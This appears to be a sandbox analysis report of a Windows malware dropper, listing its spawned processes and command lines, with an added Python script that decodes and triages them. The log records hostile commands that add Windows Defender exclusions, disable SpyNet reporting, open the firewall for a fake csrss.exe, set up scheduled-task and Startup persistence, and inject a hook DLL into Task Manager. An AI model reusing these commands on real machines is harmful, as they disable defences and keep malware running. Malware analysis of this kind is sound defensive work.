Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
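Several command lines in the Processes section below are worth decoding rather than reading as they appear: the `powershell.exe -enc` argument, the `cmd /c cmd < Inebriarti.htm & ping -n 5 localhost` line (cmd.exe reading its script from a redirected file, then ping used as a sleep), and the two `schtasks /create` lines that register `PowerControl_Svc.exe` at logon and hourly with `/rl HIGHEST`. The Python below is an added example, not part of the report; it takes those four command lines as constructed input, decodes the base64 UTF-16LE payload (it is `Start-Sleep -Seconds 20`, a delay serving the same purpose as the ping), extracts the script file fed to cmd.exe on stdin, and pulls task name, trigger, run level and target out of each schtasks invocation. The tag names are this example's own.

```python
"""Triage sandbox-reported process command lines: decode PowerShell
-EncodedCommand payloads, take apart schtasks /create persistence and flag
cmd.exe being fed a script through stdin redirection. Added example; the
command lines are copied from the report's Processes section.
"""
from __future__ import annotations

import base64
import ntpath
import re

# Constructed input: the four command lines of interest, copied from the report.
CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==',
    r'cmd /c cmd < Inebriarti.htm & ping -n 5 localhost',
    r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST',
    r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST',
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_SCHTASKS_OPTS = ("/tn", "/tr", "/sc", "/mo", "/ru", "/rl")


def split_cmdline(line: str) -> list[str]:
    """Split on whitespace while keeping double-quoted spans intact (cmd.exe has no escape character)."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(line)]


def decode_encoded_command(argv: list[str]) -> str | None:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
    followed by base64 of the UTF-16LE script text."""
    for i, arg in enumerate(argv[:-1]):
        switch = arg.lower().lstrip("-/")
        if switch.startswith("e") and "encodedcommand".startswith(switch):
            return base64.b64decode(argv[i + 1]).decode("utf-16-le")
    return None


def parse_schtasks_create(argv: list[str]) -> dict[str, str] | None:
    """Return the persistence-relevant /create options, or None for anything that is not schtasks /create."""
    if not argv or ntpath.basename(argv[0]).lower() not in ("schtasks", "schtasks.exe"):
        return None
    lowered = [a.lower() for a in argv]
    if "/create" not in lowered:
        return None
    opts: dict[str, str] = {}
    for i, arg in enumerate(lowered[:-1]):
        if arg in _SCHTASKS_OPTS:
            opts[arg[1:]] = argv[i + 1]  # keep the original case of the value
    return opts


def triage(line: str) -> dict:
    """One finding per command line: executable, anything decoded, and tags (tag names are this example's own)."""
    argv = split_cmdline(line)
    exe = ntpath.basename(argv[0]).lower() if argv else ""
    finding: dict = {"exe": exe, "tags": []}
    if exe.startswith("powershell"):
        decoded = decode_encoded_command(argv)
        if decoded is not None:
            finding["decoded"] = decoded
            finding["tags"].append("powershell-encoded")
    if exe in ("cmd", "cmd.exe"):
        m = re.search(r"<\s*(\S+)", line)  # "cmd < file": the file is the batch script
        if m:
            finding["stdin_script"] = m.group(1)
            finding["tags"].append("cmd-stdin-script")
    if re.search(r"\bping\b.*-n\s+\d+", line, re.IGNORECASE):
        finding["tags"].append("ping-delay")  # ping -n N localhost as a poor man's sleep
    task = parse_schtasks_create(argv)
    if task is not None:
        finding["task"] = task
        finding["tags"].append("schtasks-persistence")
        if task.get("rl", "").upper() == "HIGHEST":
            finding["tags"].append("runlevel-highest")
    return finding


if __name__ == "__main__":
    for cmdline in CMDLINES:
        print(triage(cmdline))
```

The `/tr` value of both tasks is the same binary under `C:\Program Files (x86)\PowerControl\`, so the two tasks are one persistence mechanism with two triggers, and the task names, the path and the `ONLOGON`/`HOURLY` pair are the values to carry into a hunt query.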
Processes
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
"C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
"C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"
C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
"C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"
C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
"C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
"C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"
C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
"C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
"C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
"C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"
C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
"C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216
C:\Users\Admin\AppData\Local\Temp\M52CB.exe
"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772
C:\Users\Admin\AppData\Local\Temp\M52CB.exe
"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556
C:\Users\Admin\AppData\Local\Temp\EH46E.exe
"C:\Users\Admin\AppData\Local\Temp\EH46E.exe"
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe
https://iplogger.org/1x5az7
C:\Windows\SysWOW64\taskkill.exe
taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"
C:\ProgramData\50543188494393494002.exe
"C:\ProgramData\50543188494393494002.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108
C:\Windows\SysWOW64\taskkill.exe
taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
"C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"
C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
"C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"
C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
"C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"
C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe
"C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"
C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe
"C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\
C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe
"C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H
C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe
.\Install.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608
C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5436 -s 708
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHbFtyKwQ"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Windows\SysWOW64\explorer.exe
